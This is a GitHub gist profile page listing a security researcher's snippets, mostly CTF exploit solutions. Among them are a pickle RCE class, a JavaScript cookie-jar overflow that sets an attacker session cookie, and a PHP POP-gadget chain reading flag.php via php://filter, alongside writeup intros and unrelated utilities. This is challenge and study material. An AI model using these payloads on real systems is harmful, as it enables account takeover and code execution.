Skip to content

Instantly share code, notes, and snippets.

View DreyAnd's full-sized avatar
👻

DreyAnd

👻
99 followers · 10 following
View GitHub Profile
@DreyAnd
DreyAnd / doomer-solver.py
Created April 1, 2025 07:25
SCC2025 - Doomer solution
from urllib.parse import quote
import httpx
import random
import string
import time
def generate_random_creds() -> str:
username = "".join(random.choices(string.ascii_letters + string.digits, k=8))
password = "".join(random.choices(string.ascii_letters + string.digits, k=8))
@DreyAnd
DreyAnd / exp.py
Created April 22, 2024 22:39
Umass CTF 2024 HTTP Request Smuggling Challenge
import socket
import pickle
import base64
import os
import requests
host = "test.ctf"
port = 5000
class RCE:
@DreyAnd
DreyAnd / exp.js
Last active June 7, 2023 09:02
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
} // cookie jar overflow to get our session on top
document.cookie="session=.eJwlzkFOAzEMheG7ZI2QYyd20hU3GdlODCM6VJopbBB371Ss36-n7zctsc_jI11Cr8d8Scs60iVhNdfaM0ExRZmlAc_MURUI1AGtlzNBldnYJZN4hWY4GYU6Y68wIqx4zUNgUhE2hNy5IXkG65wduuD50oVKsBsqc8gggO6YTsj3Mfd_zc_q93V7e990vb76bTtXP_ZY7rfP-fXUshcPEqjBVK0UoihDuzQ9sRaRsYVGpL8HalZEQw.ZIBGow._I7RDVGPLQVfSP4mjIrlGJ_zoxc; domain=.hackthe.space" // future admin
@DreyAnd
DreyAnd / java-deser.md
Last active April 22, 2024 22:58

-- Insecure Java Deserialization --

The goal of this writeup is to give a quick walkthrough of practical scenarios of Deserialization vulnerabilities that arise in many programming languages, specifically Java in our case, and how we can go from using a simple pre-built gadget chain to writing our own custom gadget chains and eventually gaining code execution on a target server.

1. What even is Deserialization?

Deserialization is the process of building a data object from a stream of bytes (objects and other complex data structures formatted in a certain manner):

Image

@DreyAnd
DreyAnd / intigriti-july-xss-writeup.md
Created July 29, 2022 18:32
Intigriti July XSS writeup

The Intigriti July XSS challenge was a great challenge created by antonvroemans which included a quite funny bug de-escalation from an SQL injection to an XSS with a CSP bypass. Leaving that aside, it was a great chance to practice skills in multiple attack vectors and improve.

The challenge

The challenge rules are the following:

Image

The goal is to pop a 0-click XSS inside that domain, who would've thought of any other vulnerabilities right?

@DreyAnd
DreyAnd / exp.php
Created January 24, 2022 01:34
MRCTF2020 - ezpop
<?php
// POP gadget structure: Show __wakeup() -> Show __toString() -> Test __get()
// -> Modifier __invoke() -> Modifier append() --> LFI
class Modifier {
protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show {
@DreyAnd
DreyAnd / goroutines-setup.go
Created November 6, 2021 14:21
usual setup for concurrency
package main
import (
"fmt"
"time"
"sync"
)
func DatabaseAdder(wg *sync.WaitGroup, new_subdomain string) {
defer wg.Done()
@DreyAnd
DreyAnd / r53-remove.py
Created October 5, 2021 09:05
remove all route53 zones
import subprocess
import sys
#easier than boto3
def list_zones():
listZones = """aws route53 list-hosted-zones-by-name | jq '.HostedZones[] | "\(.Name) \(.Id)"'""" # returns max first 100 (do a while loop)
listZone_proc = subprocess.Popen(listZones, stdout=subprocess.PIPE, shell=True)
listZone_out = listZone_proc.stdout.read().decode('utf-8').split('\n')
@DreyAnd
DreyAnd / BlackBurpTheme.theme.json
Created June 25, 2021 23:46
{
"name": "BlackBurpTheme",
"dark": true,
"author": "DreyAnd",
"editorScheme": "/HyperScheme.xml",
"ui": {
"*": {
"background": "#000000",
"inactiveBackground": "#000000",
"activeBackground": "#000000",